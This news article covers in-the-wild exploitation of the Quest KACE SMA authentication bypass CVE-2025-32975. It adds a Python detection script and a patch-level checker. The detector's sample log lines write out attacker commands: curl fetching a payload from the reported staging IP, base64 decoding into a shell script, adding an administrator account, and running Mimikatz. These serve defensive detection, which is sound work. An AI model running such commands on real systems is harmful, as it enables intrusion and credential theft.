Hackers Exploit Critical Quest KACE Flaw to Hijack Unpatched Systems
Threat actors are suspected of exploiting a maximum-severity vulnerability in Quest KACE Systems Management Appliance, or SMA, according to Arctic Wolf. The cybersecurity company said it began seeing malicious activity in customer environments during the week of March 9, 2026, and that the behavior is consistent with exploitation of CVE-2025-32975 on SMA systems exposed to the internet.
How the Attack Works
Arctic Wolf described CVE-2025-32975 as an authentication bypass flaw with a CVSS score of 10.0, meaning an attacker can impersonate a legitimate user without valid credentials.
In practical terms, that kind of weakness can let an intruder move straight into administrative access and, in the worst case, take over the appliance completely.
Quest patched the issue in May 2025, but unpatched systems remain at risk.
In the incidents Arctic Wolf investigated, the attackers appear to have used the flaw to seize administrative control and run remote commands.
The company said the intruders dropped Base64-encoded payloads from an external server at 216.126.225[.]156 using the curl command.
That step suggests the attackers were not just testing access, but actively staging additional tools inside compromised environments.
Arctic Wolf also said the attackers created extra administrative accounts by using runkbot.exe, a background process linked to the SMA Agent that is used for running scripts and managing installations.
Researchers also saw Windows Registry changes made through a PowerShell script, which may have been used for persistence or to alter system settings in a way that would help the attackers stay hidden.
The activity did not stop there.
Arctic Wolf said the attackers harvested credentials with Mimikatz, a well-known tool often abused to pull passwords and authentication material from Windows systems.
The company also observed discovery and reconnaissance activity, including checks for logged-in users and administrator accounts, along with commands such as net time and net group.
Those commands can help attackers map the environment and decide where to move next.
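The behaviours reported above (curl retrieval from the staging server, Base64 decoding, account creation through runkbot.exe, registry changes from PowerShell, Mimikatz, and net time / net group discovery) translate naturally into process-telemetry detections. The script below is an added example written for this article, not code from Arctic Wolf or Quest. The JSON log format, host names, paths, registry key and sample lines are constructed for illustration, and modelling the account-creation step as runkbot.exe parenting a `net user ... /add` command is an assumption about how that step would appear in telemetry, since the report does not describe the exact mechanism.

```python
"""Added example: tag constructed process-creation log lines with the behaviours
reported in the Quest KACE SMA campaign. Log format, hosts and paths are
constructed for illustration; only the staging IP and tool names come from the report."""
import json
import re

# Defanged indicator from the report, re-fanged only for string matching.
STAGING_HOST = "216.126.225[.]156".replace("[.]", ".")


def _cmd(ev):
    """Lower-cased command line of an event (empty string if absent)."""
    return ev.get("cmdline", "").lower()


# Each rule maps a tag to a predicate over one normalised event dict.
RULES = {
    # curl pulling a payload from the reported staging server
    "payload_download": lambda ev: "curl" in _cmd(ev) and STAGING_HOST in _cmd(ev),
    # decoding a Base64 blob after download (certutil, PowerShell, or base64 -d)
    "base64_decode": lambda ev: bool(re.search(
        r"certutil.*-decode\b|frombase64string|\bbase64\s+(-d|--decode)\b", _cmd(ev))),
    # account creation spawned by the SMA agent's runkbot.exe (assumed telemetry shape)
    "admin_account_via_runkbot": lambda ev: ev.get("parent", "").lower().endswith("runkbot.exe")
        and "net" in _cmd(ev)
        and ("/add" in _cmd(ev) or "localgroup administrators" in _cmd(ev)),
    # registry modification issued from PowerShell
    "powershell_registry_change": lambda ev: ev.get("image", "").lower().endswith("powershell.exe")
        and bool(re.search(r"set-itemproperty|new-itemproperty|reg add", _cmd(ev))),
    # credential harvesting tool matched by name; renamed binaries need LSASS-access telemetry instead
    "mimikatz": lambda ev: "mimikatz" in ev.get("image", "").lower() or "mimikatz" in _cmd(ev),
    # discovery commands named in the report
    "recon_net_command": lambda ev: bool(re.search(r"\bnet(\.exe)?\s+(time|group)\b", _cmd(ev))),
}


def classify(event):
    """Return the sorted list of rule tags matching one event dict."""
    return sorted(tag for tag, pred in RULES.items() if pred(event))


def scan(lines):
    """Parse JSON log lines and return [(line_no, host, tags)] for every line
    that matches at least one rule. Malformed lines are skipped, not fatal."""
    hits = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        tags = classify(ev)
        if tags:
            hits.append((n, ev.get("host", "?"), tags))
    return hits


# Constructed sample telemetry (raw strings so JSON escapes survive intact).
SAMPLE_LOG = [
    r'{"host":"sma01","parent":"bash","image":"curl","cmdline":"curl -s http://216.126.225.156/x -o /tmp/x.b64"}',
    r'{"host":"sma01","parent":"bash","image":"base64","cmdline":"base64 -d /tmp/x.b64 > /tmp/x.sh"}',
    r'{"host":"ws07","parent":"C:\\Program Files (x86)\\Quest\\KACE\\runkbot.exe","image":"cmd.exe","cmdline":"cmd.exe /c net user kace_svc <pw> /add && net localgroup administrators kace_svc /add"}',
    r'{"host":"ws07","parent":"cmd.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -NoP -c Set-ItemProperty -Path HKLM:\\SOFTWARE\\Example -Name Hidden -Value 1"}',
    r'{"host":"ws07","parent":"cmd.exe","image":"C:\\Temp\\mimikatz.exe","cmdline":"mimikatz.exe"}',
    r'{"host":"ws07","parent":"cmd.exe","image":"net.exe","cmdline":"net group \"Domain Admins\" /domain"}',
    r'{"host":"ws07","parent":"cmd.exe","image":"net.exe","cmdline":"net time \\\\dc01"}',
    r'{"host":"ws07","parent":"explorer.exe","image":"notepad.exe","cmdline":"notepad.exe notes.txt"}',
    "this line is not json and is skipped",
]

if __name__ == "__main__":
    for line_no, host, tags in scan(SAMPLE_LOG):
        print(f"line {line_no} [{host}]: {', '.join(tags)}")
```

Each rule is deliberately narrow and independently testable; in a real pipeline the interesting signal is several of these tags firing on the same host within a short window, which is the post-exploitation chain the report describes rather than any one command in isolation.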
Why This Matters
Arctic Wolf further said the attackers obtained Remote Desktop Protocol (RDP) access to backup infrastructure such as Veeam and Veritas, as well as to domain controllers.
That is a worrying sign because backup systems and domain controllers sit near the center of many corporate networks.
If attackers reach them, they can often expand access quickly and make recovery much harder.
For now, the attackers’ end goal is still unclear, according to Arctic Wolf.
Even so, the pattern fits a serious post-exploitation campaign rather than a simple scan or nuisance intrusion.
When a maximum-severity flaw is exposed to the internet, the window between a patch's release and its abuse is exactly where defenders who delay updating get caught out.
What Quest Said
Quest has already addressed the issue in versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 Patch 5, and 14.1.101 Patch 4.
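Checking an SMA inventory against that list is a small but error-prone task because two of the fixed releases carry a separate patch level. The script below is an added example written for this article, not a Quest tool. It assumes version strings look like the ones quoted above (`13.2.183` or `14.0.341 Patch 5`), that a missing patch level means patch 0, that within one release branch a higher build supersedes a lower one, and that branches not named in the article should be flagged for a look at the vendor advisory rather than guessed at; the host names are constructed.

```python
"""Added example: decide whether an SMA version string is at or above the fixed
versions named in the article. Parsing and comparison rules are assumptions,
not Quest's documented versioning semantics."""
import re

# Fixed versions as reported, keyed by release branch (major, minor) -> (build, patch level).
FIXED = {
    (13, 0): (385, 0),
    (13, 1): (81, 0),
    (13, 2): (183, 0),
    (14, 0): (341, 5),
    (14, 1): (101, 4),
}

_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)(?:\s+Patch\s+(\d+))?\s*$", re.IGNORECASE)


def parse_version(text):
    """'14.0.341 Patch 5' -> (14, 0, 341, 5); '13.0.385' -> (13, 0, 385, 0).
    A missing 'Patch N' is treated as patch level 0 (assumption).
    Raises ValueError for any other shape so odd inventory entries are not silently classified."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised SMA version string: {text!r}")
    major, minor, build, patch = m.groups()
    return int(major), int(minor), int(build), int(patch or 0)


def patch_status(text):
    """Return 'patched', 'vulnerable' or 'unknown-branch' for one version string.
    Assumption: within a branch a higher build supersedes the fixed build, and an
    equal build is compared by patch level. Branches absent from the article's
    list are reported as unknown so the vendor advisory is consulted."""
    major, minor, build, patch = parse_version(text)
    fixed = FIXED.get((major, minor))
    if fixed is None:
        return "unknown-branch"
    fixed_build, fixed_patch = fixed
    if build != fixed_build:
        return "patched" if build > fixed_build else "vulnerable"
    return "patched" if patch >= fixed_patch else "vulnerable"


def triage(inventory):
    """Map host -> status for a {host: version string} inventory."""
    return {host: patch_status(version) for host, version in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    sample = {
        "sma-prod": "14.0.341 Patch 4",
        "sma-dr": "14.0.341 Patch 5",
        "sma-lab": "13.2.180",
    }
    for host, status in triage(sample).items():
        print(f"{host}: {status}")
```

Any host that comes back `vulnerable` and is reachable from the internet should be treated as a possible compromise, not just a patching backlog item, given the activity described above.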
Arctic Wolf said administrators should apply the latest updates and avoid exposing SMA instances directly to the internet.
For organizations that still depend on this appliance, that advice is essential.
A patched system is the first line of defense, but reducing public exposure is just as important when an authentication bypass can hand attackers the keys to the network.